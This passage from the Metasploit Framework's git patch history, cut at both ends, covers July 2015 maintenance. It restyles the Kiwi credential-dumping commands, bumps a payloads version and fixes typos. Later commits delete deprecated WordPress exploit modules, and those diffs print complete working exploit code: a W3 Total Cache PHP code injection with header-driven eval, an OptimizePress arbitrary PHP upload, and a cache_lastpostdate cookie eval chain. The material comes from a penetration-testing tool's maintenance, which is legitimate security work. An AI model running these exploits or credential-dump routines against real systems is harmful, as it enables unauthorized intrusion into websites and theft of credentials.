           id = "#{values[0]}-#{values[1]}".gsub(/[\\\/\$ ]/, '-')
           file = "kerb-#{id}-#{Rex::Text.rand_text_alpha(8)}.tkt"
@@ -305,7 +304,7 @@ class Console::CommandDispatcher::Kiwi
   #
   def cmd_kerberos_ticket_purge(*args)
     client.kiwi.kerberos_ticket_purge
-    print_good("Kerberos tickets purged")
+    print_good('Kerberos tickets purged')
   end
 
   #
@@ -313,7 +312,7 @@ class Console::CommandDispatcher::Kiwi
   #
   def cmd_kerberos_ticket_use(*args)
     if args.length != 1
-      print_line("Usage: kerberos_ticket_use ticketpath")
+      print_line('Usage: kerberos_ticket_use ticketpath')
       return
     end
 
@@ -325,25 +324,13 @@ class Console::CommandDispatcher::Kiwi
 
     print_status("Using Kerberos ticket stored in #{target}, #{ticket.length} bytes")
     client.kiwi.kerberos_ticket_use(ticket)
-    print_good("Kerberos ticket applied successfully")
-  end
-
-  def wifi_list_usage
-    print(
-      "\nUsage: wifi_list\n\n" +
-      "List WiFi interfaces, profiles and passwords.\n\n")
+    print_good('Kerberos ticket applied successfully')
   end
 
   #
   # Dump all the wifi profiles/credentials
   #
   def cmd_wifi_list(*args)
-    # if any arguments are specified, then fire up a usage message
-    if args.length > 0
-      wifi_list_usage
-      return
-    end
-
     results = client.kiwi.wifi_list
 
     if results.length > 0
@@ -362,24 +349,39 @@ class Console::CommandDispatcher::Kiwi
           table << [p[:name], p[:auth], p[:key_type], p[:shared_key]]
         end
 
-        print_line table.to_s
-        print_line "State: #{r[:state]}"
+        print_line(table.to_s)
+        print_line("State: #{r[:state]}")
       end
     else
       print_line
-      print_error("No wireless profiles found on the target.")
+      print_error('No wireless profiles found on the target.')
     end
 
     print_line
     return true
   end
 
+  @@creds_opts = Rex::Parser::Arguments.new(
+    '-o' => [ true,  'Write the output to the specified file.' ],
+    '-h' => [ false, 'Help menu.' ]
+  )
+
+  #
+  # Displays information about the various creds commands
+  #
+  def cmd_creds_usage(provider)
+    print_line("Usage: creds_#{provider} [options]")
+    print_line
+    print_line("Dump #{provider} credentials.")
+    print_line(@@creds_opts.usage)
+  end
+
   #
   # Dump all the possible credentials to screen.
   #
   def cmd_creds_all(*args)
     method = Proc.new { client.kiwi.all_pass }
-    scrape_passwords("all", method)
+    scrape_passwords('all', method, args)
   end
 
   #
@@ -387,7 +389,7 @@ class Console::CommandDispatcher::Kiwi
   #
   def cmd_creds_wdigest(*args)
     method = Proc.new { client.kiwi.wdigest }
-    scrape_passwords("wdigest", method)
+    scrape_passwords('wdigest', method, args)
   end
 
   #
@@ -395,7 +397,7 @@ class Console::CommandDispatcher::Kiwi
   #
   def cmd_creds_msv(*args)
     method = Proc.new { client.kiwi.msv }
-    scrape_passwords("msv", method)
+    scrape_passwords('msv', method, args)
   end
 
   #
@@ -403,7 +405,7 @@ class Console::CommandDispatcher::Kiwi
   #
   def cmd_creds_livessp(*args)
     method = Proc.new { client.kiwi.livessp }
-    scrape_passwords("livessp", method)
+    scrape_passwords('livessp', method, args)
   end
 
   #
@@ -411,7 +413,7 @@ class Console::CommandDispatcher::Kiwi
   #
   def cmd_creds_ssp(*args)
     method = Proc.new { client.kiwi.ssp }
-    scrape_passwords("ssp", method)
+    scrape_passwords('ssp', method, args)
   end
 
   #
@@ -419,7 +421,7 @@ class Console::CommandDispatcher::Kiwi
   #
   def cmd_creds_tspkg(*args)
     method = Proc.new { client.kiwi.tspkg }
-    scrape_passwords("tspkg", method)
+    scrape_passwords('tspkg', method, args)
   end
 
   #
@@ -427,22 +429,22 @@ class Console::CommandDispatcher::Kiwi
   #
   def cmd_creds_kerberos(*args)
     method = Proc.new { client.kiwi.kerberos }
-    scrape_passwords("kerberos", method)
+    scrape_passwords('kerberos', method, args)
   end
 
 protected
 
   def check_privs
     if system_check
-      print_good("Running as SYSTEM")
+      print_good('Running as SYSTEM')
     else
-      print_warning("Not running as SYSTEM, execution may fail")
+      print_warning('Not running as SYSTEM, execution may fail')
     end
   end
 
   def system_check
-    unless (client.sys.config.getuid == "NT AUTHORITY\\SYSTEM")
-      print_warning("Not currently running as SYSTEM")
+    unless client.sys.config.is_system?
+      print_warning('Not currently running as SYSTEM')
       return false
     end
 
@@ -459,7 +461,12 @@ protected
   #   Meterpreter that lay in the house that Jack built.
   #
   # @return [void]
-  def scrape_passwords(provider, method)
+  def scrape_passwords(provider, method, args)
+    if args.include?('-h')
+      cmd_creds_usage(provider)
+      return
+    end
+
     check_privs
     print_status("Retrieving #{provider} credentials")
     accounts = method.call
@@ -468,24 +475,40 @@ protected
       'Header'    => "#{provider} credentials",
       'Indent'    => 0,
       'SortIndex' => 0,
-      'Columns'   =>
-      [
-        'Domain', 'User', 'Password', 'Auth Id', 'LM Hash', 'NTLM Hash'
+      'Columns'   => [
+        'Domain', 'User', 'Password', 'LM Hash', 'NTLM Hash'
       ]
     )
 
     accounts.each do |acc|
       table << [
-        acc[:domain] || "",
-        acc[:username] || "",
-        acc[:password] || "",
-        "#{acc[:auth_hi]} ; #{acc[:auth_lo]}",
-        to_hex(acc[:lm] || ""),
-        to_hex(acc[:ntlm] || "")
+        acc[:domain] || '',
+        acc[:username] || '',
+        acc[:password] || '',
+        to_hex(acc[:lm]),
+        to_hex(acc[:ntlm])
       ]
     end
 
-    print_line table.to_s
+    output = table.to_s
+    print_line(output)
+
+    # determine if a target file path was passed in
+    file_index = args.index('-o')
+    unless file_index.nil?
+      if args.length > file_index + 1
+        # try to write the file to disk
+        begin
+          ::File.write(args[file_index + 1], output)
+          print_good("Output written to #{args[file_index + 1]}")
+        rescue
+          print_error("Unable to write to #{args[file_index + 1]}")
+        end
+      else
+        print_error('Missing file path for -o parameter')
+      end
+    end
+
     return true
   end
 
@@ -496,8 +519,7 @@ protected
   # @param (see Rex::Text.to_hex)
   # @return [String] The result of {Rex::Text.to_hex}, strip'd
   def to_hex(value, sep = '')
-    value ||= ""
-    Rex::Text.to_hex(value, sep).strip
+    Rex::Text.to_hex(value || '', sep).strip
   end
 
 end

From b782e3fc0f8e40bd9084f7fcf9541ead3afa7835 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Mon, 13 Jul 2015 00:13:02 -0500
Subject: [PATCH 0747/1013] update to metasploit-payloads 1.0.7

This includes a couple of transport fixes for posix meterpreter and some
robustness fixes when flushing reverse_tcp sockets.
---
 Gemfile.lock                 | 4 ++--
 metasploit-framework.gemspec | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 5daa50130d..3072bd0495 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (= 1.0.0)
       metasploit-model (= 1.0.0)
-      metasploit-payloads (= 1.0.6)
+      metasploit-payloads (= 1.0.7)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -123,7 +123,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (1.0.6)
+    metasploit-payloads (1.0.7)
     metasploit_data_models (1.2.5)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 99789ed0b4..b8c159ef23 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -62,7 +62,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model', '1.0.0'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.0.6'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.0.7'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # Needed by anemone crawler

From d1f23c54c785ab7a30e1d8df8c1251a1e2d3ee5b Mon Sep 17 00:00:00 2001
From: Mo Sadek <msadek@rapid7.com>
Date: Mon, 13 Jul 2015 09:38:29 -0500
Subject: [PATCH 0748/1013] Changed Filed to Failed on line 43 in
 java_rmi_registry.rb

---
 modules/auxiliary/gather/java_rmi_registry.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/gather/java_rmi_registry.rb b/modules/auxiliary/gather/java_rmi_registry.rb
index 67178d7346..85173e7ca3 100644
--- a/modules/auxiliary/gather/java_rmi_registry.rb
+++ b/modules/auxiliary/gather/java_rmi_registry.rb
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
     send_header
     ack = recv_protocol_ack
     if ack.nil?
-      print_error("#{peer} - Filed to negotiate RMI protocol")
+      print_error("#{peer} - Failed to negotiate RMI protocol")
       disconnect
       return
     end

From 6a5645d747e802b6fe9797f8f10f7454508f987c Mon Sep 17 00:00:00 2001
From: Mo Sadek <msadek@rapid7.com>
Date: Mon, 13 Jul 2015 11:21:20 -0500
Subject: [PATCH 0749/1013] Changed "Filed" to "Failed" in multiple files

---
 lib/rex/java/serialization/model/proxy_class_desc.rb | 2 +-
 lib/rex/proto/kerberos/model/kdc_request.rb          | 4 ++--
 modules/auxiliary/scanner/misc/java_rmi_server.rb    | 2 +-
 3 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/lib/rex/java/serialization/model/proxy_class_desc.rb b/lib/rex/java/serialization/model/proxy_class_desc.rb
index 61ad5de9b4..702790b9e3 100644
--- a/lib/rex/java/serialization/model/proxy_class_desc.rb
+++ b/lib/rex/java/serialization/model/proxy_class_desc.rb
@@ -53,7 +53,7 @@ module Rex
           def encode
             unless class_annotation.class == Rex::Java::Serialization::Model::Annotation ||
                     super_class.class == Rex::Java::Serialization::Model::ClassDesc
-              raise Rex::Java::Serialization::EncodeError, 'Filed to serialize ProxyClassDesc'
+              raise Rex::Java::Serialization::EncodeError, 'Failed to serialize ProxyClassDesc'
             end
             encoded = ''
             encoded << [interfaces.length].pack('N')
diff --git a/lib/rex/proto/kerberos/model/kdc_request.rb b/lib/rex/proto/kerberos/model/kdc_request.rb
index 23fa03df5c..b301fa5901 100644
--- a/lib/rex/proto/kerberos/model/kdc_request.rb
+++ b/lib/rex/proto/kerberos/model/kdc_request.rb
@@ -118,7 +118,7 @@ module Rex
               when 4
                 self.req_body = decode_asn1_req_body(val)
               else
-                raise ::RuntimeError, 'Filed to decode KdcRequest SEQUENCE'
+                raise ::RuntimeError, ' to decode KdcRequest SEQUENCE'
               end
             end
           end
@@ -163,4 +163,4 @@ module Rex
       end
     end
   end
-end
\ No newline at end of file
+end
diff --git a/modules/auxiliary/scanner/misc/java_rmi_server.rb b/modules/auxiliary/scanner/misc/java_rmi_server.rb
index f78fd7017b..5cdf03a371 100644
--- a/modules/auxiliary/scanner/misc/java_rmi_server.rb
+++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
     send_header
     ack = recv_protocol_ack
     if ack.nil?
-      print_error("#{peer} - Filed to negotiate RMI protocol")
+      print_error("#{peer} - Failed to negotiate RMI protocol")
       disconnect
       return
     end

From 4cd6e0c72b730443136b83564591d85f59917655 Mon Sep 17 00:00:00 2001
From: Mo Sadek <msadek@rapid7.com>
Date: Mon, 13 Jul 2015 11:27:32 -0500
Subject: [PATCH 0750/1013] Added "Failed" to line 121 of kdc_request.rb

---
 lib/rex/proto/kerberos/model/kdc_request.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/rex/proto/kerberos/model/kdc_request.rb b/lib/rex/proto/kerberos/model/kdc_request.rb
index b301fa5901..e54332739e 100644
--- a/lib/rex/proto/kerberos/model/kdc_request.rb
+++ b/lib/rex/proto/kerberos/model/kdc_request.rb
@@ -118,7 +118,7 @@ module Rex
               when 4
                 self.req_body = decode_asn1_req_body(val)
               else
-                raise ::RuntimeError, ' to decode KdcRequest SEQUENCE'
+                raise ::RuntimeError, 'Failed to decode KdcRequest SEQUENCE'
               end
             end
           end

From 4177cdacd6750f1ae1b74b328cdf1d66af4454d1 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 13 Jul 2015 12:41:29 -0500
Subject: [PATCH 0751/1013] Remove php_wordpress_total_cache, please use
 wp_total_cache_exec

The time is up for exploit/unix/webapp/php_wordpress_total_cache,
please use exploit/unix/webapp/wp_total_cache_exec instead.
---
 .../unix/webapp/php_wordpress_total_cache.rb  | 210 ------------------
 1 file changed, 210 deletions(-)
 delete mode 100644 modules/exploits/unix/webapp/php_wordpress_total_cache.rb

diff --git a/modules/exploits/unix/webapp/php_wordpress_total_cache.rb b/modules/exploits/unix/webapp/php_wordpress_total_cache.rb
deleted file mode 100644
index 6486d80b29..0000000000
--- a/modules/exploits/unix/webapp/php_wordpress_total_cache.rb
+++ /dev/null
@@ -1,210 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class Metasploit3 < Msf::Exploit::Remote
-  include Msf::HTTP::Wordpress
-  include Msf::Exploit::Remote::HttpClient
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2015, 5, 23), 'exploit/unix/webapp/wp_total_cache_exec')
-
-  Rank = ExcellentRanking
-
-  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Wordpress W3 Total Cache PHP Code Execution',
-      'Description'    => %q{
-          This module exploits a PHP Code Injection vulnerability against Wordpress plugin
-        W3 Total Cache for versions up to and including 0.9.2.8.  WP Super Cache 1.2 or older
-        is also reported as vulnerable.  The vulnerability is due to the handling of certain
-        macros such as mfunc, which allows arbitrary PHP code injection.  A valid post ID is
-        needed in order to add the malicious comment.  If the POSTID option isn't specified,
-        then the module will automatically find or bruteforce one.  Also, if anonymous comments
-        aren't allowed, then a valid username and password must be provided.  In addition,
-        the "A comment is held for moderation" option on Wordpress must be unchecked for
-        successful exploitation.  This module has been tested against Wordpress 3.5 and
-        W3 Total Cache 0.9.2.3 on a Ubuntu 10.04 system.
-      },
-      'Author'	=>
-        [
-          'Unknown', # Vulnerability discovery
-          'juan vazquez', # Metasploit module
-          'hdm', # Metasploit module
-          'Christian Mehlmauer' # Metasploit module
-        ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          [ 'CVE', '2013-2010' ],
-          [ 'OSVDB', '92652' ],
-          [ 'BID', '59316' ],
-          [ 'URL', 'http://wordpress.org/support/topic/pwn3d' ],
-          [ 'URL', 'http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/' ],
-          [ 'WPVDB', '6622' ]
-        ],
-      'Privileged'     => false,
-      'Platform'       => ['php'],
-      'Arch'           => ARCH_PHP,
-      'Payload'        =>
-        {
-          'DisableNops' => true,
-        },
-      'Targets'        => [ ['Wordpress 3.5', {}] ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => 'Apr 17 2013'
-      ))
-
-      register_options(
-        [
-          OptInt.new('POSTID', [ false, "The post ID where publish the comment" ]),
-          OptString.new('USERNAME', [ false,  "The user to authenticate as (anonymous if username not provided)"]),
-          OptString.new('PASSWORD', [ false,  "The password to authenticate with (anonymous if password not provided)" ])
-        ], self.class)
-
-      register_advanced_options(
-        [
-            OptInt.new('MIN_POST_ID', [ false, 'Specify the first post_id used for bruteforce', 1]),
-            OptInt.new('MAX_POST_ID', [ false, 'Specify the last post_id used for bruteforce', 1000])
-        ])
-  end
-
-  def require_auth?
-    @user = datastore['USERNAME']
-    @password = datastore['PASSWORD']
-
-    if @user and @password and not @user.empty? and not @password.empty?
-      return true
-    else
-      return false
-    end
-  end
-
-  def post_comment(text)
-    php_payload = "#{text}<!--mfunc if(isset($_SERVER['HTTP_SUM'])) { if (sha1($_SERVER['HTTP_SUM']) == '#{@sum}' ) { eval(base64_decode($_SERVER['HTTP_CMD'])); } } --><!--/mfunc-->"
-
-    if @auth
-      uri = wordpress_post_comment_auth(php_payload, @post_id, @cookie)
-    else
-      author = rand_text_alpha(8)
-      author_email = "#{rand_text_alpha(3)}@#{rand_text_alpha(3)}.com"
-      author_url = rand_text_alpha(8)
-      uri = wordpress_post_comment_no_auth(php_payload,
-          @post_id,
-          author,
-          author_email,
-          author_url
-      )
-      @unauth_cookie = wordpress_get_unauth_comment_cookies(author, author_email, author_url)
-    end
-    uri
-  end
-
-  def exploit
-    unless wordpress_and_online?
-      fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site")
-    end
-
-    @auth = require_auth?
-
-    if @auth
-      print_status("#{peer} - Trying to login...")
-      @cookie = wordpress_login(@user, @password)
-      if @cookie.nil?
-        fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful")
-      end
-      print_status("#{peer} - login successful")
-    else
-      print_status("#{peer} - Trying unauthenticated exploitation...")
-    end
-
-    if datastore['POSTID'] and datastore['POSTID'] != 0
-      @post_id = datastore['POSTID']
-      print_status("#{peer} - Using the user supplied POST ID #{@post_id}...")
-    else
-      print_status("#{peer} - Trying to get posts from feed...")
-      all_posts = wordpress_get_all_blog_posts_via_feed
-      # First try all blog posts provided by feed
-      if all_posts
-        all_posts.each do |p|
-          vprint_status("#{peer} - Checking #{p}...")
-          enabled = wordpress_post_comments_enabled?(p, @cookie)
-          @post_id = get_post_id_from_body(enabled)
-          if @post_id
-            print_status("#{peer} - Found Post POST ID #{@post_id}...")
-            break
-          end
-        end
-      end
-      # if nothing found, bruteforce a post id
-      unless @post_id
-        print_status("#{peer} - Nothing found. Trying to brute force a valid POST ID...")
-        min_post_id = datastore['MIN_POST_ID']
-        max_post_id = datastore['MAX_POST_ID']
-        @post_id = wordpress_bruteforce_valid_post_id_with_comments_enabled(min_post_id, max_post_id, @cookie)
-        if @post_id.nil?
-          fail_with(Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment")
-        else
-          print_status("#{peer} - Using the brute forced POST ID #{@post_id}...")
-        end
-      end
-    end
-
-    random_test = rand_text_alpha(64)
-    @sum = Rex::Text.sha1(random_test)
-
-    print_status("#{peer} - Injecting the PHP Code in a comment...")
-    text = Rex::Text::rand_text_alpha(10)
-    post_uri = post_comment(text)
-    if post_uri.nil?
-      fail_with(Failure::Unknown, "#{peer} - Expected redirection not returned")
-    end
-
-    print_status("#{peer} - Executing the payload...")
-    options = {
-        'method' => 'GET',
-        'uri' => post_uri,
-        'headers' => {
-            'Cmd' => Rex::Text.encode_base64(payload.encoded),
-            'Sum' => random_test
-        }
-    }
-    options.merge!({'cookie' => @cookie}) if @auth
-    # Used to see anonymous, moderated comments
-    options.merge!({'cookie' => @unauth_cookie}) if @unauth_cookie
-    res = send_request_cgi(options)
-    if res and res.code == 301
-      fail_with(Failure::Unknown, "#{peer} - Unexpected redirection, maybe comments are moderated")
-    end
-
-    if res and !res.body.match(/#{Regexp.escape(text)}/)
-      fail_with(Failure::Unknown, "#{peer} - Comment not in post, maybe comments are moderated")
-    end
-
-  end
-
-  def check
-    res = wordpress_and_online?
-    unless res
-      vprint_error("#{peer} does not seeem to be Wordpress site")
-      return Exploit::CheckCode::Unknown
-    end
-
-    if res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /W3 Total Cache\/([0-9\.]*)/
-      version = $1
-      if version <= "0.9.2.8"
-        return Exploit::CheckCode::Appears
-      else
-        return Exploit::CheckCode::Safe
-      end
-    end
-
-    if res.body and (res.body =~ /Performance optimized by W3 Total Cache/ or res.body =~ /Cached page generated by WP-Super-Cache/)
-      return Exploit::CheckCode::Detected
-    end
-
-    return Exploit::CheckCode::Safe
-
-  end
-end

From 90cc3f7891cab6fc85ed7e9f9f3e1de5e58cb733 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 13 Jul 2015 12:45:39 -0500
Subject: [PATCH 0752/1013] Remove php_wordpress_optimizepress, use
 wp_optimizepress_upload

Please use exploit/unix/webapp/wp_optimizepress_upload instead.
---
 .../webapp/php_wordpress_optimizepress.rb     | 150 ------------------
 1 file changed, 150 deletions(-)
 delete mode 100644 modules/exploits/unix/webapp/php_wordpress_optimizepress.rb

diff --git a/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb b/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
deleted file mode 100644
index b478a9ce48..0000000000
--- a/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
+++ /dev/null
@@ -1,150 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-require 'uri'
-
-class Metasploit3 < Msf::Exploit::Remote
-
-  include Msf::HTTP::Wordpress
-  include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::FileDropper
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2015, 5, 23), 'exploit/unix/webapp/wp_optimizepress_upload')
-
-  def initialize(info = {})
-    super(update_info(info,
-      'Name'            => 'WordPress OptimizePress Theme File Upload Vulnerability',
-      'Description'     => %q{
-        This module exploits a vulnerability found in the the Wordpress theme OptimizePress. The
-        vulnerability is due to an insecure file upload on the media-upload.php component, allowing
-        an attacker to upload arbitrary PHP code. This module has been tested successfully on
-        OptimizePress 1.45.
-      },
-      'Author'          =>
-        [
-          'United of Muslim Cyber Army', # Vulnerability discovery
-          'Mekanismen' # Metasploit module
-        ],
-      'License'         => MSF_LICENSE,
-      'References'      =>
-        [
-          [ 'URL', "http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/" ],
-          [ 'WPVDB', '7441' ]
-        ],
-      'Privileged'      => false,
-      'Platform'        => ['php'],
-      'Arch'            => ARCH_PHP,
-      'Targets'         => [ ['OptimizePress', {}] ],
-      'DefaultTarget'   => 0,
-      'DisclosureDate'  => 'Nov 29 2013'
-    ))
-
-    register_advanced_options(
-      [
-        OptString.new('THEMEDIR', [ true, 'OptimizePress Theme directory', 'OptimizePress'])
-      ])
-  end
-
-  def check
-    uri = target_uri.path
-    res = send_request_cgi({
-      'method'   => 'GET',
-      'uri'      => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
-    })
-
-    if res and res.code == 200 and res.body.to_s =~ /Upload New Image/
-      return Exploit::CheckCode::Appears
-    end
-
-    return Exploit::CheckCode::Safe
-  end
-
-  def exploit
-    uri = normalize_uri(target_uri.path)
-
-    #get upload filepath
-    print_status("#{peer} - Getting the upload path...")
-    res = send_request_cgi({
-      'method'   => 'GET',
-      'uri'      => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
-    })
-
-    unless res and res.code == 200
-      fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
-    end
-
-    if res.body =~ /<input name="imgpath" type="hidden" id="imgpath" value="(.*)" \/>/
-      file_path = $1
-    else
-      fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath")
-    end
-
-    #set cookie
-    cookie = res.get_cookies
-
-    filename = rand_text_alphanumeric(8) + ".php"
-
-    #upload payload
-    post_data = Rex::MIME::Message.new
-    post_data.add_part("<?php #{payload.encoded} ?>", "application/octet-stream", nil, "form-data; name=\"newcsimg\"; filename=\"#{filename}\"")
-    post_data.add_part("Upload File", nil, nil, "form-data; name=\"button\"")
-    post_data.add_part("1", nil, nil, "form-data; name=\"newcsimg\"")
-    post_data.add_part("#{file_path}", nil, nil, "form-data; name=\"imgpath\"")
-
-    print_status("#{peer} - Uploading PHP payload...")
-
-    n_data = post_data.to_s
-
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php'),
-      'ctype' => 'multipart/form-data; boundary=' + post_data.bound,
-      'data' => n_data,
-      'headers' => {
-        'Referer' => "#{uri}/wp-content/themes/OptimizePress/lib/admin/media-upload.php"
-      },
-      'cookie' => cookie
-    })
-
-    unless res and res.code == 200
-      fail_with(Failure::Unknown, "#{peer} - Unable to upload payload")
-    end
-
-    print_good("#{peer} - Payload uploaded successfully. Disclosing the payload path...")
-    #get path to payload
-    res = send_request_cgi({
-      'method'   => 'GET',
-      'uri'      => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
-    })
-
-    unless res and res.code == 200
-      fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
-    end
-
-    payload_url = ""
-
-    if res.body =~ /name="cs_img" value="(.*#{filename}.*)" \/> <span/
-      payload_url =$1
-    else
-      fail_with(Failure::Unknown, "#{peer} - Unable to deliver the payload")
-    end
-
-    begin
-      u = URI(payload_url)
-    rescue ::URI::InvalidURIError
-      fail_with(Failure::Unknown, "#{peer} - Unable to deliver the payload, #{payload_url} isn't an URL'")
-    end
-
-    register_files_for_cleanup(File::basename(u.path))
-
-    print_good("#{peer} - Our payload is at: #{u.path}! Executing payload...")
-    send_request_cgi({
-      'method' => 'GET',
-      'uri' => u.path
-    })
-  end
-end

From b80427aed241722562373cafe65585a648fcb73b Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 13 Jul 2015 12:49:27 -0500
Subject: [PATCH 0753/1013] Remove php_wordpress_lastpost, use wp_lastpost_exec
 instead.

Please use exploit/unix/webapp/wp_lastpost_exec instead
---
 .../unix/webapp/php_wordpress_lastpost.rb     | 82 -------------------
 1 file changed, 82 deletions(-)
 delete mode 100644 modules/exploits/unix/webapp/php_wordpress_lastpost.rb

diff --git a/modules/exploits/unix/webapp/php_wordpress_lastpost.rb b/modules/exploits/unix/webapp/php_wordpress_lastpost.rb
deleted file mode 100644
index 66ceaec01d..0000000000
--- a/modules/exploits/unix/webapp/php_wordpress_lastpost.rb
+++ /dev/null
@@ -1,82 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-  Rank = ExcellentRanking
-
-  include Msf::Exploit::Remote::Tcp
-  include Msf::Exploit::Remote::HttpClient
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2015, 5, 23), 'exploit/unix/webapp/wp_lastpost_exec')
-
-  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'WordPress cache_lastpostdate Arbitrary Code Execution',
-      'Description'    => %q{
-          This module exploits an arbitrary PHP code execution flaw in the WordPress
-        blogging software. This vulnerability is only present when the PHP 'register_globals'
-        option is enabled (common for hosting providers). All versions of WordPress prior to
-        1.5.1.3 are affected.
-      },
-      'Author'         => [ 'str0ke <str0ke[at]milw0rm.com>', 'hdm' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          ['CVE', '2005-2612'],
-          ['OSVDB', '18672'],
-          ['BID', '14533'],
-          ['WPVDB', '6034']
-        ],
-      'Privileged'     => false,
-      'Payload'        =>
-        {
-          'DisableNops' => true,
-          'Compat'      =>
-            {
-              'ConnectionType' => 'find'
-            },
-          'Space'       => 512
-        },
-      'Platform'       => 'php',
-      'Arch'           => ARCH_PHP,
-      'Targets'        => [[ 'Automatic', { }]],
-      'DisclosureDate' => 'Aug 9 2005',
-      'DefaultTarget' => 0))
-
-    register_options(
-      [
-        OptString.new('URI', [true, "The full URI path to WordPress", "/"]),
-      ], self.class)
-  end
-
-  def exploit
-
-    enc = payload.encoded.unpack('C*').map { |c| "chr(#{c})"}.join('.') + ".chr(32)"
-    str = Rex::Text.encode_base64('args[0]=eval(base64_decode('+enc+')).die()&args[1]=x')
-    data =
-      "wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;"+
-      "wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;"+
-      "cache_lastpostmodified[server]=//e;cache_lastpostdate[server]="+str+
-      ";wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;"+
-      "wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;"+
-      "wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;"
-
-    # Trigger the command execution bug
-    res = send_request_cgi({
-        'uri'      => normalize_uri(datastore['URI']),
-        'cookie'   => data
-      }, 25)
-
-    if (res)
-      print_status("The server returned: #{res.code} #{res.message}")
-    else
-      print_status("No response from the server")
-    end
-  end
-
-end

From dfbeb24a8f4ed6c9d019721029e3a85e8102ff5e Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 13 Jul 2015 12:51:48 -0500
Subject: [PATCH 0754/1013] Remove php_wordpress_infusionsoft, use
 wp_infusionsoft_upload

Please use exploit/unix/webapp/wp_infusionsoft_upload instead.
---
 .../unix/webapp/php_wordpress_infusionsoft.rb | 85 -------------------
 1 file changed, 85 deletions(-)
 delete mode 100644 modules/exploits/unix/webapp/php_wordpress_infusionsoft.rb

diff --git a/modules/exploits/unix/webapp/php_wordpress_infusionsoft.rb b/modules/exploits/unix/webapp/php_wordpress_infusionsoft.rb
deleted file mode 100644
index 838043f5c2..0000000000
--- a/modules/exploits/unix/webapp/php_wordpress_infusionsoft.rb
+++ /dev/null
@@ -1,85 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-  Rank = ExcellentRanking
-
-  include Msf::HTTP::Wordpress
-  include Msf::Exploit::FileDropper
-  include Msf::Module::Deprecated
-
